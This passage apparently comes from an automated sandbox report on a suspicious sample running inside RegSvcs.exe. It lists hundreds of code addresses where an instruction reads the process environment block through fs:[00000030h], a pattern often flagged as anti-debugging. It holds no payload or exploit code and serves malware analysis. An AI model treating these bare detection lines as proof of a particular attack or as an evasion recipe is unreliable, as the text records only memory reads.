                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01352050 mov eax, dword ptr fs:[00000030h]4_2_01352050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6050 mov eax, dword ptr fs:[00000030h]4_2_013D6050
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E80A8 mov eax, dword ptr fs:[00000030h]4_2_013E80A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135208A mov eax, dword ptr fs:[00000030h]4_2_0135208A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134C0F0 mov eax, dword ptr fs:[00000030h]4_2_0134C0F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013920F0 mov ecx, dword ptr fs:[00000030h]4_2_013920F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134A0E3 mov ecx, dword ptr fs:[00000030h]4_2_0134A0E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013580E9 mov eax, dword ptr fs:[00000030h]4_2_013580E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D60E0 mov eax, dword ptr fs:[00000030h]4_2_013D60E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D20DE mov eax, dword ptr fs:[00000030h]4_2_013D20DE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014160B8 mov eax, dword ptr fs:[00000030h]4_2_014160B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014160B8 mov ecx, dword ptr fs:[00000030h]4_2_014160B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0141A352 mov eax, dword ptr fs:[00000030h]4_2_0141A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134C310 mov ecx, dword ptr fs:[00000030h]4_2_0134C310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01370310 mov ecx, dword ptr fs:[00000030h]4_2_01370310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]4_2_0138A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]4_2_0138A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A30B mov eax, dword ptr fs:[00000030h]4_2_0138A30B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F437C mov eax, dword ptr fs:[00000030h]4_2_013F437C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D035C mov ecx, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D035C mov eax, dword ptr fs:[00000030h]4_2_013D035C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F8350 mov ecx, dword ptr fs:[00000030h]4_2_013F8350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D2349 mov eax, dword ptr fs:[00000030h]4_2_013D2349
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0140C3CD mov eax, dword ptr fs:[00000030h]4_2_0140C3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]4_2_01348397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]4_2_01348397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01348397 mov eax, dword ptr fs:[00000030h]4_2_01348397
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]4_2_0137438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137438F mov eax, dword ptr fs:[00000030h]4_2_0137438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]4_2_0134E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]4_2_0134E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E388 mov eax, dword ptr fs:[00000030h]4_2_0134E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]4_2_0136E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]4_2_0136E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0136E3F0 mov eax, dword ptr fs:[00000030h]4_2_0136E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013863FF mov eax, dword ptr fs:[00000030h]4_2_013863FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013603E9 mov eax, dword ptr fs:[00000030h]4_2_013603E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F43D4 mov eax, dword ptr fs:[00000030h]4_2_013F43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013F43D4 mov eax, dword ptr fs:[00000030h]4_2_013F43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A3C0 mov eax, dword ptr fs:[00000030h]4_2_0135A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013583C0 mov eax, dword ptr fs:[00000030h]4_2_013583C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D63C0 mov eax, dword ptr fs:[00000030h]4_2_013D63C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134823B mov eax, dword ptr fs:[00000030h]4_2_0134823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01400274 mov eax, dword ptr fs:[00000030h]4_2_01400274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01354260 mov eax, dword ptr fs:[00000030h]4_2_01354260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134826B mov eax, dword ptr fs:[00000030h]4_2_0134826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134A250 mov eax, dword ptr fs:[00000030h]4_2_0134A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01356259 mov eax, dword ptr fs:[00000030h]4_2_01356259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D8243 mov eax, dword ptr fs:[00000030h]4_2_013D8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D8243 mov ecx, dword ptr fs:[00000030h]4_2_013D8243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]4_2_013602A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602A0 mov eax, dword ptr fs:[00000030h]4_2_013602A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov ecx, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E62A0 mov eax, dword ptr fs:[00000030h]4_2_013E62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E284 mov eax, dword ptr fs:[00000030h]4_2_0138E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D0283 mov eax, dword ptr fs:[00000030h]4_2_013D0283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013602E1 mov eax, dword ptr fs:[00000030h]4_2_013602E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0135A2C3 mov eax, dword ptr fs:[00000030h]4_2_0135A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01360535 mov eax, dword ptr fs:[00000030h]4_2_01360535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E53E mov eax, dword ptr fs:[00000030h]4_2_0137E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013E6500 mov eax, dword ptr fs:[00000030h]4_2_013E6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01424500 mov eax, dword ptr fs:[00000030h]4_2_01424500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138656A mov eax, dword ptr fs:[00000030h]4_2_0138656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01358550 mov eax, dword ptr fs:[00000030h]4_2_01358550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013745B1 mov eax, dword ptr fs:[00000030h]4_2_013745B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D05A7 mov eax, dword ptr fs:[00000030h]4_2_013D05A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E59C mov eax, dword ptr fs:[00000030h]4_2_0138E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01384588 mov eax, dword ptr fs:[00000030h]4_2_01384588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01352582 mov eax, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01352582 mov ecx, dword ptr fs:[00000030h]4_2_01352582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0137E5E7 mov eax, dword ptr fs:[00000030h]4_2_0137E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013525E0 mov eax, dword ptr fs:[00000030h]4_2_013525E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138C5ED mov eax, dword ptr fs:[00000030h]4_2_0138C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013565D0 mov eax, dword ptr fs:[00000030h]4_2_013565D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A5D0 mov eax, dword ptr fs:[00000030h]4_2_0138A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138E5CF mov eax, dword ptr fs:[00000030h]4_2_0138E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0138A430 mov eax, dword ptr fs:[00000030h]4_2_0138A430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134C427 mov eax, dword ptr fs:[00000030h]4_2_0134C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0134E420 mov eax, dword ptr fs:[00000030h]4_2_0134E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_013D6420 mov eax, dword ptr fs:[00000030h]4_2_013D6420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01388402 mov eax, dword ptr fs:[00000030h]4_2_01388402
